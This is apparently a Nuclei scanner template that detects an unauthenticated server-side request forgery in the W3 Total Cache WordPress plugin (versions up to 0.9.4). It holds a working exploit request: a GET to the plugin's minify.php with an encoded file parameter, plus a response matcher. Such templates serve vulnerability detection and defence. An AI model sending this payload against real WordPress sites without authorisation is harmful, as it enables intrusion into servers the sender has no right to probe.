id: w3c-total-cache-ssrf info: name: Wordpress W3C Total Cache SSRF <= 0.9.4 author: random_robbie severity: medium tags: wordpress,wp-plugin,cache,ssrf description: The W3 Total Cache WordPress plugin was affected by an Unauthenticated Server Side Request Forgery (SSRF) security vulnerability. reference: - https://wpvulndb.com/vulnerabilities/8644 - https://klikki.fi/adv/w3_total_cache.html requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css' matchers: - type: word words: - "NessusFileIncludeTest" part: body